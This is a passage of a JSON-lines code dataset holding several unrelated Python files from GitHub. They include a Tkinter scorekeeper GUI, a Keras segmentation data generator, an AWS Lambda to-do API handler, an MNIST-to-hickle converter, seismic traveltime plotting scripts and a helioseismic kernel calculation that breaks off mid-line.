os.path.join(directory, 'image.jpg') #attach path to filename\n\n# Open the image file and convert to an ImageTk object\nimg = PIL.Image.open(filename) # create a PIL.Image from the jpg file\ntkimg = PIL.ImageTk.PhotoImage(img, master=root) # convert the PIL.Image to a PIL.TkImage\n\n# Get 
a filename in the same directory as this program\ndirectory2 = os.path.dirname(os.path.abspath(__file__)) #use OS to get path\nfilename2 = os.path.join(directory2, 'download.jpg') #connect it to filename\n\n# Open the image file and convert to an ImageTk object\nimg2 = PIL.Image.open(filename2) # create a PIL.Image from the jpg file\ntkimg2 = PIL.ImageTk.PhotoImage(img2, master=root) #convert it\n\n# Add the ImageTk object to the canvas.\nicon = canvas.create_image(145, 53, image=tkimg) #add title image\nicon2 = canvas2.create_image(145, 53, image=tkimg2) #add other image\n\n#create the animation canvas\ncanvas2 = Canvas(root, height = 200, width=287, background='pink') #create second canvas\ncanvas2.grid(row=7, column=1, columnspan=5) #position it\n\n#animate it\ntext1 = canvas2.create_text(-1, 100, fill='black', text='Who Will Win???') #add initial text\n\n#create winner texts for future animation\nwin1text = canvas2.create_text(-60, 130, fill='red', text='PLAYER 1 WINS!!') #1 win text\nwin2text = canvas2.create_text(-60, 130, fill='blue', text='PLAYER 2 WINS!!')# 2 win text\n\n#animation functions\ndef trophy(): #define function\n    trophy = canvas2.create_image(-15, 60, image=tkimg2, tag='trophy') #make image\n    for x in range(0, 80): #80 times\n        canvas2.move('trophy', 2, 0) #move image\n        root.update() #show mvt\n        time.sleep(0.02) #wait a bit\n    \ndef animate(): #define function\n    for x in range(0, 75): #75 times\n        canvas2.move(1, 2, 0) #move image\n        root.update() #show mvt\n        time.sleep(0.02) #wait a bit\nanimate() #animate it\n\n#enter into the main loop\nroot.mainloop()\n","repo_name":"bethpol/ScorekeeperGUI","sub_path":"Bpolito_Sharisrikanth_GUIproject.py","file_name":"Bpolito_Sharisrikanth_GUIproject.py","file_ext":"py","file_size_in_byte":7944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"23552027905","text":"import os\nimport random\n\nimport cv2\nimport numpy as np\n\ndef data_gen(img_folder, mask_folder, batch_size):\n    c = 0\n    n = os.listdir(img_folder) #List of training images\n    random.shuffle(n)\n    \n    while (True):\n        img = np.zeros((batch_size, 512, 512, 3)).astype('float')\n        mask = np.zeros((batch_size, 512, 512, 1)).astype('float')\n\n        for i in range(c, c+batch_size): #initially from 0 to 16, c = 0. 
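\n            # editorial note: n is reshuffled at each epoch boundary below, so the\n            # image/mask pairing relies on both folders holding identical filenames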
\n\n train_img = cv2.imread(img_folder+'/'+n[i])/255.\n train_img = cv2.resize(train_img, (512, 512))# Read an image from folder and resize\n \n img[i-c] = train_img #add to array - img[0], img[1], and so on.\n \n\n train_mask = cv2.imread(mask_folder+'/'+n[i], cv2.IMREAD_GRAYSCALE)/255.\n train_mask = cv2.resize(train_mask, (512, 512))\n train_mask = train_mask.reshape(512, 512, 1) # Add extra dimension for parity with train_img size [512 * 512 * 3]\n\n mask[i-c] = train_mask\n\n c+=batch_size\n if(c+batch_size>=len(os.listdir(img_folder))):\n c=0\n random.shuffle(n)\n # print \"randomizing again\"\n yield img, mask\n\n\n\n\ntrain_frame_path = '/path/to/training_frames'\ntrain_mask_path = '/path/to/training_masks'\n\nval_frame_path = '/path/to/validation_frames'\nval_mask_path = '/path/to/validation_frames'\n\n# Train the model\ntrain_gen = data_gen(train_frame_path,train_mask_path, batch_size = 4)\nval_gen = data_gen(val_frame_path,val_mask_path, batch_size = 4)","repo_name":"mojojojo99/Detect-Avoid","sub_path":"imageSeg/custom_generator.py","file_name":"custom_generator.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39660347868","text":"import json\nfrom datetime import datetime\nfrom dynamo_model import TodoModel\n\nprint(\"Loading function\")\n\n\ndef respond(err, res=None):\n return {\n \"statusCode\": \"400\" if err else \"200\",\n \"body\": err.message if err else json.dumps(res),\n \"headers\": {\n \"Content-Type\": \"application/json\",\n },\n }\n\n\ndef parse_item(pynamodb_item):\n return {\n \"id\": pynamodb_item.id,\n \"name\": pynamodb_item.name,\n \"created_at\": pynamodb_item.created_at,\n \"status\": pynamodb_item.status,\n \"completed_at\": pynamodb_item.completed_at,\n }\n\n\ndef generate_timestamp():\n now = datetime.now()\n return now.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\n\n\ndef list_items():\n return [parse_item(pynamodb_item) for pynamodb_item in TodoModel.scan()]\n\n\ndef create_item(item_id, payload):\n todo = TodoModel(item_id)\n todo.name = payload.get(\"name\")\n todo.created_at = generate_timestamp()\n todo.save()\n return parse_item(todo)\n\n\ndef update_item(item_id, payload):\n todo = TodoModel.get(item_id)\n todo.name = payload.get(\"name\") or todo.name\n if payload.get(\"status\"):\n todo.status = payload.get(\"status\")\n todo.completed_at = generate_timestamp()\n todo.save()\n return parse_item(todo)\n\n\ndef delete_item(item_id):\n todo = TodoModel.get(item_id)\n todo.delete()\n return parse_item(todo)\n\n\ndef cors_preflight_request():\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Access-Control-Allow-Headers\": \"*\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"*\",\n },\n \"body\": json.dumps(\"Hello from Lambda!\"),\n }\n\n\ndef lambda_handler(event, context):\n print(\"Received event: \" + json.dumps(event, indent=2))\n\n operations = {\n \"GET\": list_items,\n \"POST\": create_item,\n \"PUT\": update_item,\n \"DELETE\": delete_item,\n }\n\n operation = event[\"httpMethod\"]\n\n if operation == \"OPTIONS\":\n return cors_preflight_request()\n\n if operation == \"GET\":\n return respond(None, operations[operation]())\n\n item_id = event[\"pathParameters\"].get(\"proxy\")\n if operation == \"DELETE\":\n return respond(None, operations[operation](item_id))\n elif operation in [\"POST\", \"PUT\"]:\n payload = json.loads(event[\"body\"])\n return respond(None, operations[operation](item_id, payload))\n 
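# any other HTTP verb falls through to the unsupported-method error below\n    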
else:\n return respond(ValueError('Unsupported method \"{}\"'.format(operation)))\n","repo_name":"jonwils24/todo-app","sub_path":"terraform/modules/api/lambdas/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38584807858","text":"\r\nimport numpy as np\r\nimport hickle as hkl\r\nimport matplotlib as plt\r\nfrom sklearn import preprocessing as p\r\nmnist_size=10000\r\nLENGTH_OF_VID =20*4000#20*50#20*10000##50#20*10000#20*mnist_size # For later experiments, modify size as necessary20*1000\r\nIM_SZ_WID = 64\r\nIM_SZ_HGT=64\r\nVIDEO_CHANNELS = 1\r\n\r\n\r\ntrain_video=np.load(\"mnist_test_seq.npy\")\r\n\r\n\r\ndef video_generator():\r\n in_video = np.empty([LENGTH_OF_VID , IM_SZ_HGT, IM_SZ_WID, VIDEO_CHANNELS], dtype=np.float32)#LENGTH_OF_VID was 1st attribute\r\n # in_video[:,:,:,:] = 1 # set background of 1st channel to white\r\n \r\n # train_video = np.zeros((n_frames, row, col, 1), dtype=np.float)\r\n \r\n # for i in range(0,LENGTH_OF_VID):\r\n count =0\r\n for i in range (6001, 4000+6000):#):#10000):\r\n gray_frame= train_video[:,i,:,:]\r\n # gray_frame = np.multiply((1/255.0), gray_frame)\r\n gray_frame = np.expand_dims(gray_frame, axis=3)\r\n in_video[0+count:count+20,:,:,:]= np.copy(gray_frame)\r\n count=count+20\r\n return in_video\r\n \r\n\r\ndef save_as_hickle():\r\n in_video = video_generator()\r\n num_frames = in_video.shape[0]\r\n print(in_video.shape)\r\n source_string = [\"mnist\"]*num_frames\r\n # dump data to file\r\n print( in_video.shape)\r\n hkl.dump(in_video, 'kitti_data/4000_mnist_data1.hkl', mode='w')\r\n # dump names to file\r\n hkl.dump(source_string, 'kitti_data/4000_mnist_sources1.hkl', mode='w')\r\n \r\n \r\nsave_as_hickle()","repo_name":"NellyElsayed/rgcLSTM","sub_path":"numpy_to_hkl.py","file_name":"numpy_to_hkl.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"31396535875","text":"import numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\ndef readBinaryArray(n,filename):\n return np.fromfile(filename, dtype = np.float32, count = n)\n\ndef readBinaryMatrix(n1,n2,filename):\n data = np.fromfile(filename, dtype = np.float32, count = n1*n2) \n return np.reshape(data, [n1,n2], order='F')\n\ndef readBinaryVolume(n1,n2,n3,filename):\n data = np.fromfile(filename, dtype = np.float32, count = n1*n2*n3) \n return np.reshape(data, [n1,n2,n3], order='F')\n\ndef analytical_firstArrival(v, z, x):\n direct_wave = x / v[0]\n\n first_arrivals = np.zeros(len(x))\n refracted_waves = np.zeros((len(z), len(x)))\n\n for n in range(len(z)):\n refracted_waves[n,:] = x / v[n+1]\n for i in range(n+1):\n angle = np.arcsin(v[i] / v[n+1])\n refracted_waves[n,:] += 2.0*z[i]*np.cos(angle) / v[i]\n \n for offset in range(len(x)):\n first_arrivals[offset] = np.min(np.append(refracted_waves[:, offset], direct_wave[offset]))\n\n return first_arrivals\n\ndef check_geometry(models, shots, nodes, dh, slices, subplots, scale = 2.0):\n \n if np.sum(subplots) == 2:\n modelShape = np.array(np.shape(models))\n maxModelDistance = np.max(np.shape(models))\n minModelDistance = np.min(np.shape(models))\n\n vmin = np.min(models)\n vmax = np.max(models)\n\n else:\n modelShape = np.array(np.shape(models[0]))\n maxModelDistance = np.max(np.shape(models[0]))\n 
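# (editorial note) when a stack of models is passed, the first volume fixes the\n        # grid shape and the shared color limits used by every panel\n        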
minModelDistance = np.min(np.shape(models[0]))\n\n vmin = np.min(models[0])\n vmax = np.max(models[0])\n\n nz, nx, ny = modelShape\n [z, x, y] = scale * (minModelDistance / maxModelDistance) * modelShape / maxModelDistance\n\n px = 1/plt.rcParams['figure.dpi'] \n ticks = np.array([3,7,7], dtype = int)\n\n fig = plt.figure(1, figsize=(910*px*subplots[1], 780*px*subplots[0]))\n\n xloc = np.linspace(0,nx-1,ticks[1], dtype = int)\n yloc = np.linspace(0,ny-1,ticks[2], dtype = int)\n zloc = np.linspace(0,nz-1,ticks[0], dtype = int)\n\n m2km = 1e-3\n\n xlab = np.around(xloc * dh[0] * m2km, decimals = 1)\n ylab = np.around(yloc * dh[1] * m2km, decimals = 1)\n zlab = np.around(zloc * dh[2] * m2km, decimals = 1)\n\n axes = np.array([[0.75 - x, 0.98 - y , x, y], \n [ 0.75, 0.98 - y , z, y],\n [0.75 - x, 0.98 - y - z , x, z],\n [0.75 - x, 0.98 - y - 1.8*z, x, z]])\n\n xTickDirection = ['out', 'out', 'out']\n yTickDirection = ['out', 'in', 'out']\n\n xTickLock = [xloc, zloc[1:], xloc]\n yTickLock = [yloc, yloc, zloc[1:]]\n\n xTickLabel = [[], zlab[1:], xlab]\n yTickLabel = [ylab, [], zlab[1:]]\n\n xLabel = [\"X [km]\", \"Z [km]\", \"X [km]\"]\n yLabel = [\"Y [km]\", \" \", \"Z [km]\"]\n\n yInvert = [True, True, False]\n\n xSlices = [[np.arange(modelShape[1]), np.ones(modelShape[1])*slices[1], \"--g\"],\n [np.arange(modelShape[0]), np.ones(modelShape[0])*slices[1], \"--g\"],\n [np.arange(modelShape[1]), np.ones(modelShape[1])*slices[0], \"--r\"]] \n\n ySlices = [[np.ones(modelShape[2])*slices[2], np.arange(modelShape[2]), \"--m\"],\n [np.ones(modelShape[2])*slices[0], np.arange(modelShape[2]), \"--r\"],\n [np.ones(modelShape[0])*slices[2], np.arange(modelShape[0]), \"--m\"]]\n\n # picking geometry \n\n zy_plane_shot_y = np.array([])\n zy_plane_shot_z = np.array([])\n\n if np.size(shots) != 3:\n for i in range(len(shots)): \n if int(shots[i,0]/dh[0])-1 <= int(slices[2]) <= int(shots[i,0]/dh[0])+1:\n zy_plane_shot_y = np.append(zy_plane_shot_y, shots[i,1]/dh[1]) \n zy_plane_shot_z = np.append(zy_plane_shot_z, shots[i,2]/dh[2]) \n else:\n if int(shots[0]/dh[0])-1 <= int(slices[2]) <= int(shots[0]/dh[0])+1:\n zy_plane_shot_y = np.append(zy_plane_shot_y, shots[1]/dh[1]) \n zy_plane_shot_z = np.append(zy_plane_shot_z, shots[2]/dh[2]) \n\n zx_plane_shot_x = np.array([])\n zx_plane_shot_z = np.array([]) \n\n if np.size(shots) != 3:\n for i in range(len(shots)):\n if int(shots[i,1]/dh[1])-1 <= int(slices[1]) <= int(shots[i,1]/dh[1])+1:\n zx_plane_shot_x = np.append(zx_plane_shot_x, shots[i,0]/dh[0]) \n zx_plane_shot_z = np.append(zx_plane_shot_z, shots[i,2]/dh[2]) \n else:\n if int(shots[1]/dh[1])-1 <= int(slices[1]) <= int(shots[1]/dh[1])+1:\n zx_plane_shot_x = np.append(zx_plane_shot_x, shots[0]/dh[0]) \n zx_plane_shot_z = np.append(zx_plane_shot_z, shots[2]/dh[2]) \n \n zy_plane_node_y = np.array([])\n zy_plane_node_z = np.array([])\n\n if np.size(nodes) != 3:\n for i in range(len(nodes)):\n if int(nodes[i,0]/dh[0])-1 <= int(slices[2]) <= int(nodes[i,0]/dh[0])+1:\n zy_plane_node_y = np.append(zy_plane_node_y, nodes[i,1]/dh[1]) \n zy_plane_node_z = np.append(zy_plane_node_z, nodes[i,2]/dh[2]) \n else:\n if int(nodes[0]/dh[0])-1 <= int(slices[2]) <= int(nodes[0]/dh[0])+1:\n zy_plane_node_y = np.append(zy_plane_node_y, nodes[1]/dh[1]) \n zy_plane_node_z = np.append(zy_plane_node_z, nodes[2]/dh[2]) \n\n zx_plane_node_x = np.array([])\n zx_plane_node_z = np.array([]) \n\n if np.size(nodes) != 3:\n for i in range(len(nodes)):\n if int(nodes[i,1]/dh[1])-1 <= int(slices[1]) <= int(nodes[i,1]/dh[1])+1:\n 
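# keep only nodes lying within one grid cell of the chosen ZX slice\n                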
zx_plane_node_x = np.append(zx_plane_node_x, nodes[i,0]/dh[0]) \n zx_plane_node_z = np.append(zx_plane_node_z, nodes[i,2]/dh[2]) \n else:\n if int(nodes[1]/dh[1])-1 <= int(slices[1]) <= int(nodes[1]/dh[1])+1:\n zx_plane_node_x = np.append(zx_plane_node_x, nodes[0]/dh[0]) \n zx_plane_node_z = np.append(zx_plane_node_z, nodes[2]/dh[2]) \n \n #-------------------------------------------------------------------------------- \n\n subfigs = fig.subfigures(subplots[0], subplots[1])\n \n for i in range(subplots[0]):\n for j in range(subplots[1]):\n\n ind = i*subplots[0] + j \n\n if np.sum(subplots) == 2:\n ims = [models[slices[0],:,:].T, models[:,slices[2],:].T, models[:,:,slices[1]]]\n else:\n ims = [models[ind, slices[0],:,:].T, models[ind,:,slices[2],:].T, models[ind,:,:,slices[1]]]\n\n if np.size(shots) != 3:\n xshot = [shots[:,0]/dh[0],zy_plane_shot_z,zx_plane_shot_x]\n yshot = [shots[:,1]/dh[1],zy_plane_shot_y,zx_plane_shot_z]\n else:\n xshot = [shots[0]/dh[0],zy_plane_shot_z,zx_plane_shot_x]\n yshot = [shots[1]/dh[1],zy_plane_shot_y,zx_plane_shot_z]\n\n if np.size(nodes) != 3:\n xnode = [nodes[:,0]/dh[0],zy_plane_node_z,zx_plane_node_x]\n ynode = [nodes[:,1]/dh[1],zy_plane_node_y,zx_plane_node_z]\n else:\n xnode = [nodes[0]/dh[0],zy_plane_node_z,zx_plane_node_x]\n ynode = [nodes[1]/dh[1],zy_plane_node_y,zx_plane_node_z]\n\n for k, axs in enumerate(axes): \n if subplots[0] == 1:\n if subplots[1] == 1:\n ax = subfigs.add_axes(axs) \n else:\n ax = subfigs[j].add_axes(axs)\n elif subplots[1] == 1:\n if subplots[0] == 1:\n ax = subfigs.add_axes(axs) \n else: \n ax = subfigs[i].add_axes(axs)\n else:\n ax = subfigs[i,j].add_axes(axs)\n\n # Setting colorbar\n if k == 3:\n ax.axis(\"off\")\n cmap = mpl.colormaps[\"jet\"]\n norm = mpl.colors.Normalize(vmin*1e-3, vmax*1e-3)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"bottom\", size=\"10%\", pad=0)\n cbar = fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap), cax = cax, ticks = np.linspace(vmin*1e-3, vmax*1e-3, 5), orientation = \"horizontal\")\n cbar.ax.set_xticklabels(np.around(np.linspace(vmin*1e-3, vmax*1e-3, 5), decimals = 1))\n cbar.set_label(\"Velocity [km/s]\")\n \n # plotting model slices \n else:\n ax.imshow(ims[k], aspect = 'auto', cmap = \"jet\", vmin = vmin, vmax = vmax) \n\n ax.plot(xSlices[k][0], xSlices[k][1], xSlices[k][2], linewidth = 0.5)\n ax.plot(ySlices[k][0], ySlices[k][1], ySlices[k][2], linewidth = 0.5)\n \n ax.scatter(xshot[k], yshot[k], s = 20.0, color = \"brown\")\n ax.scatter(xnode[k], ynode[k], s = 20.0, color = \"gray\")\n\n ax.tick_params(direction = xTickDirection[k], axis='x') \n ax.tick_params(direction = yTickDirection[k], axis='y') \n \n ax.set_xticks(xTickLock[k])\n ax.set_yticks(yTickLock[k])\n\n ax.set_xticklabels(xTickLabel[k])\n ax.set_yticklabels(yTickLabel[k])\n \n ax.set_xlabel(xLabel[k])\n ax.set_ylabel(yLabel[k])\n \n if yInvert[k]:\n ax.invert_yaxis()\n \n return None\n\n#-------------------------------------------------------------------------\n\nnx = 881\nny = 881\nnz = 201\n\ndx = 25\ndy = 25\ndz = 25\n\nmodel = readBinaryVolume(nz, nx, ny, f\"../inputs/models/testModel_{nz}x{nx}x{ny}_{dx}m.bin\")\n\nshots_file = \"../inputs/geometry/xyz_shot_positions.txt\"\nnodes_file = \"../inputs/geometry/xyz_node_positions.txt\"\n\nshots = np.loadtxt(shots_file, delimiter = ',')\nnodes = np.loadtxt(nodes_file, delimiter = ',')\n\nsubplots = np.array([1, 1], dtype = int)\nslices = np.array([nz/2, nx/2, ny/2], dtype = int) # [xy, zy, zx]\ndh = np.array([dx, dy, 
dz])\n\ncheck_geometry(model, shots, nodes, dh, slices, subplots, 2.8)\nplt.savefig(f\"modelTest.png\", dpi = 200)\n\n#-------------------------------------------------------------------------\n\nv = np.array([1500, 2000, 3000, 4000])\nz = np.array([1000, 1500, 2000])\n\nx = np.sqrt((nodes[:,0] - shots[0])**2 + (nodes[:,1] - shots[1])**2)\n\nfba = analytical_firstArrival(v, z, x)\n\nn = 1256\n\ndh = np.array([100, 50, 25], dtype = int)\n\npod = np.zeros((len(dh), n))\nfim = np.zeros((len(dh), n))\nfsm = np.zeros((len(dh), n))\n\nfor i in range(len(dh)):\n \n pod[i] = np.fromfile(f\"../outputs/first_arrivals/{dh[i]}m_pod_data_nRec1256_shot_1.bin\", dtype = np.float32, count = n)\n fim[i] = np.fromfile(f\"../outputs/first_arrivals/{dh[i]}m_fim_data_nRec1256_shot_1.bin\", dtype = np.float32, count = n)\n fsm[i] = np.fromfile(f\"../outputs/first_arrivals/{dh[i]}m_fsm_data_nRec1256_shot_1.bin\", dtype = np.float32, count = n)\n\noffset = np.arange(n)\n\ncolors = [\"blue\", \"orange\", \"green\"]\nstyles = [\"dashed\", \"dotted\", \"solid\"]\ntitles = [\"Podvin & Lecomte (1991)\", \"Jeong & Whitaker (2008)\", \"Detrixhe et al. (2013) | Noble et al. (2014)\"]\n\nxloc = np.linspace(0, n, 11, dtype = int)\n\nfig, ax = plt.subplots(nrows = 3, ncols = 2, figsize = (15,8))\n\nax[0,0].plot(fba, color = \"black\")\nax[1,0].plot(fba, color = \"black\")\nax[2,0].plot(fba, color = \"black\")\n\nfor k in range(len(dh)):\n ax[0,0].plot(offset, pod[k], linestyle = styles[k], color = colors[0])\n ax[1,0].plot(offset, fim[k], linestyle = styles[k], color = colors[1])\n ax[2,0].plot(offset, fsm[k], linestyle = styles[k], color = colors[2])\n ax[0,1].plot(offset, fba - pod[k], linestyle = styles[k], color = colors[0])\n ax[1,1].plot(offset, fba - fim[k], linestyle = styles[k], color = colors[1])\n ax[2,1].plot(offset, fba - fsm[k], linestyle = styles[k], color = colors[2])\n\n for i in range(len(dh)):\n ax[i,0].set_xlabel(\"Trace index\", fontsize= 15)\n ax[i,0].set_ylabel(\"Time [s]\", fontsize = 15)\n ax[i,0].set_title(titles[i], fontsize = 18)\n\n ax[i,1].set_xlabel(\"Trace index\", fontsize = 15)\n ax[i,1].set_ylabel(\"Diff = Ta - Tn [s]\", fontsize = 15)\n ax[i,1].set_title(titles[i], fontsize = 18)\n\n for i in range(2):\n ax[k,i].set_xticks(xloc)\n ax[k,i].set_xticklabels(xloc)\n ax[k,i].set_xlim([0,n])\n\n ax[k,0].set_ylim([5.6, 6.4])\n ax[k,0].invert_yaxis()\n\nplt.tight_layout()\nplt.savefig(f\"accuracyTest.png\", dpi = 200)\n\n#-------------------------------------------------------------------------\n\nbenchmark = np.loadtxt(\"runTime.txt\", delimiter = \";\", comments = \"#\")\n\nbench_pod = benchmark[:3]\nbench_fim = benchmark[3:6]\nbench_fsm = benchmark[6:]\n\nyaxis = [\"Elapsed time [s]\", \"RAM usage [MB]\", \"GPU memory usage [MB]\"]\n\nxloc = [0, 1, 2]\nxlab = [\"2.9\", \"19.6\", \"156.1\"]\n\nfig, ax = plt.subplots(nrows = 3,ncols = 1, figsize = (10,9))\n\nfor i in range(len(dh)):\n ax[i].plot(bench_pod[:,i], \"o--\", label = \"Podvin & Lecomte (1991)\")\n ax[i].plot(bench_fim[:,i], \"o--\", label = \"Jeong & Whitaker (2008)\")\n ax[i].plot(bench_fsm[:,i], \"o--\", label = \"Detrixhe et al. (2013) | Noble et al. 
(2014)\")\n\n ax[i].set_xticks(xloc)\n ax[i].set_xticklabels(xlab)\n\n ax[i].legend(loc = \"upper left\")\n ax[i].set_ylabel(yaxis[i], fontsize = 15)\n ax[i].set_xlabel(\"Total samples in model [x 10⁶]\", fontsize = 15)\n\nplt.tight_layout()\nplt.savefig(f\"benchmarkTest.png\", dpi = 200)\n","repo_name":"phbastosa/SeisFAT3D","sub_path":"tests/modeling/generate_figures.py","file_name":"generate_figures.py","file_ext":"py","file_size_in_byte":13591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26275652815","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# @Time : 2019/12/27 15:48\n# @Author : xiaoxiong\n# @Email : xyf_0704@sina.com\n# @File : data_aug.py\n# @Software: PyCharm\n# DESC :\n\"\"\"\nfrom keras.preprocessing.image import ImageDataGenerator\n\npath = 'VOCdevkit' # 类别子文件夹的上一级\n\ndst_path = 'E:/C3D_Data/train_result'\n\n# 图片生成器\n\ndatagen = ImageDataGenerator(\n rotation_range=5,\n width_shift_range=0.02,\n height_shift_range=0.,\n shear_range=0.,\n horizontal_flip=True,\n vertical_flip=True\n)\n\ngen = datagen.flow_from_directory(\npath,\ntarget_size=(224, 224),\nbatch_size=2,\nsave_to_dir=dst_path,#生成后的图像保存路径\nsave_prefix='aug',\nsave_format='jpg')\n\n\nfor i in range(3):\n gen.next()\n","repo_name":"xiaoxiong74/Multi_Object_Detection_and_Tracking","sub_path":"keras-yolo3/data_aug.py","file_name":"data_aug.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17482957602","text":"def isprime(n):\n\tf=0\n\tfor i in range(2,int(n**0.5)+1):\n\t\tif(n%i==0):\n\t\t\tprint (\"Non-prime\")\n\t\t\tf=1\n\t\t\tbreak\n\tif(f==0):\n\t\tprint(\"Prime\")\nx=int(input(\"Enter number \"))\nisprime(x)","repo_name":"CinnamonRolls1/it-3rd-sem","sub_path":"DSA/lab1/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30904540344","text":"#PLOTTING CORRECTION TO SHRAVAN'S KERNEL\n\t\nimport timing\nkernclock = timing.stopclock() #stopclock object for timing program\ntstamp = kernclock.lap\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport functions as fn\nfrom os import getcwd\n\ntstamp('library loading') #printing elapsed time from beginning of runtime\n\nn,l,m = 1,60,0\nn_,l_,m_ = n,l,2\nnl = fn.find_nl(n,l)\nnl_ = fn.find_nl(n_,l_)\ns = 22\nt = m_-m\n\n\n#Savitsky golay filter for smoothening\nwindow = 45 #must be odd\norder = 3\n\nif(nl == None or nl_ == None):\n\tprint(\"Mode not found. Exiting.\"); exit()\n\n#loading required functions\neig_dir = (getcwd() + '/eig_files')\nU,V = fn.load_eig(n,l,eig_dir)\nU_,V_= fn.load_eig(n_,l_,eig_dir)\nr = np.loadtxt('r.dat')\nrho = np.loadtxt('rho.dat')\n\n#interpolation params\nnpts = 30000\nr_new = np.linspace(np.amin(r),np.amax(r),npts)\n\ntstamp('files loading')\n\n#setting up shorthand repeatedly used in kernel evaluation\ndef wig_red(m1,m2,m3):\n\t'''3j symbol with upper row fixed'''\n\treturn fn.wig(l_,s,l,m1,m2,m3)\nom = fn.omega\np = (-1)**(l+l_+s) #parity of selected modes\nprefac = np.sqrt((2*l_+1.) * (2*s+1.) * (2*l+1.) 
/ (4.* np.pi)) * wig_red(-m_,t,m)\n\n#EIGENFUNCTION DERIVATIVES\n\n#smoothing\nU,dU,d2U = fn.smooth(U,r,window,order,npts)\nV,dV,d2V = fn.smooth(V,r,window,order,npts)\n\nU_,dU_,d2U_ = fn.smooth(U_,r,window,order,npts)\nV_,dV_,d2V_ = fn.smooth(V_,r,window,order,npts)\n\nrho_sm, __, __ = fn.smooth(rho,r,window,order,npts)\n#re-assigning with smoothed variables\nr = r_new\nrho = rho_sm\n\n##no smoothing\n#dU, dV = np.gradient(U,r), np.gradient(V,r)\n#dU_, dV_ = np.gradient(U_,r), np.gradient(V_,r)\n#d2U_,d2V = 0.,0.\n\n\n#B-- EXPRESSION\nBmm = -r*(wig_red(0,-2,2)*om(l,0)*om(l,2)*V*dU_ + wig_red(2,-2,0)*om(l_,0)* \\\n\t\tom(l_,2)*V_*dU)\nBmm += wig_red(1,-2,1)*om(l_,0)*om(l,0)*(U-V)*(U_ - V_ + r*dV_)\nBmm *= ((-1)**m_)*prefac/(r**2)\n\n#B-- EXTRA\nBmm_ = om(l_,0)*(wig_red(2,-2,0)*om(l_,2)*U*(V_ - r*dV_) + om(l,0)*V \\\n\t\t*(wig_red(3,-2,-1)*om(l_,2)*om(l_,3)*V_ + wig_red(1,-2,1) \\\n\t\t*(-U_ + V_ + om(l_,2)**2 *V_ - r*dV_)))\nBmm_ *= (-1)**(1+m_) *prefac/r**2\n\n#B0- EXPRESSION\nB0m = wig_red(1,-1,0)*om(l_,0)*(U - (om(l,0)**2)*V)*(U_ - V_ + r*dV_)\nB0m += om(l,0)*(om(l_,0)*(wig_red(-1,-1,2)*om(l,2)*V*(U_ - V_ + r*dV_) \\\n       + 2*r*wig_red(2,-1,-1)*om(l_,2)*V_*dV) + wig_red(0,-1,1) \\\n\t   *((U-V)*(2*U_ - 2*(om(l_,0)**2)*V_ - r*dU_) + r**2 * dU_*dV))\nB0m *= 0.5*((-1)**m_)*prefac/r**2\n#B0- EXTRA\nB0m_ = om(l,0)*V*(wig_red(2,-1,-1)*om(l_,0)*om(l_,2)*(U_ - 3*V_ + r*dV_) \\\n\t\t+ wig_red(0,-1,1)*((2+om(l_,0)**2)*U_ - 2*r*dU_ + om(l_,0)**2 \\\n\t\t*(-3*V_ + r*dV_)))\nB0m_ += wig_red(1,-1,0)*om(l_,0)*U*(U_ - V_ - r*(dU_ - dV_ + r*d2V_))\nB0m_ *= 0.5*((-1)**m_)*prefac/r**2\n\n#B00 OLD\nB00 = -wig_red(0,0,0)*(2*U_ - 2*om(l_,0)**2 * V_ - r*dU_)*(-2*U + 2*om(l,0)**2 *V + \\\n\t\tr*dU)\nB00 -= 2*r*(wig_red(-1,0,1) + wig_red(1,0,-1))*om(l_,0)*om(l,0) \\\n       *(U_ - V_ + r*dV_)*dV\nB00 *= 0.5*((-1)**m_)*prefac/r**2\n#B00 EXTRA\nB00_ = -(wig_red(-1,0,1) + wig_red(1,0,-1)) * om(l_,0)*om(l,0) * V*(-4*U_+2*(1+om(l_,0)**2)*V_+r*(dU_-2*dV_))\nB00_ += wig_red(0,0,0)*U*(2*U_-2*r*dU_-2*om(l_,0)**2 *(V_-r*dV_)+r*r*d2U_)\nB00_ *= 0.5*((-1)**m_)*prefac/r**2\n\n#B+- OLD\nBpm = -r**2 * wig_red(0,0,0)*dU_*dU \nBpm += om(l_,0)*om(l,0)*(-2*(wig_red(-2,0,2)+wig_red(2,0,-2))*om(l_,2)*om(l,2)*V_*V \\\n\t\t+ wig_red(-1,0,1)*(U-V)*(U_ - V_ + r*dV_) + wig_red(1,0,-1) \\\n\t\t*(U-V)*(U_ - V_ + r*dV_))\nBpm *= 0.5*((-1)**m_)*prefac/r**2\n#B+- EXTRA\nBpm_ = (wig_red(-1,0,1) + wig_red(1,0,-1)) * om(l_,0)*om(l,0) * V * (U_-V_+r*(-dU_+dV_))\nBpm_ += wig_red(0,0,0) * r*r*U*d2U_\nBpm_ *= 0.5*((-1)**m_)*prefac/r**2\n\n\ntstamp('calculations')\n\nr_start = 0.9\nstart_ind = 
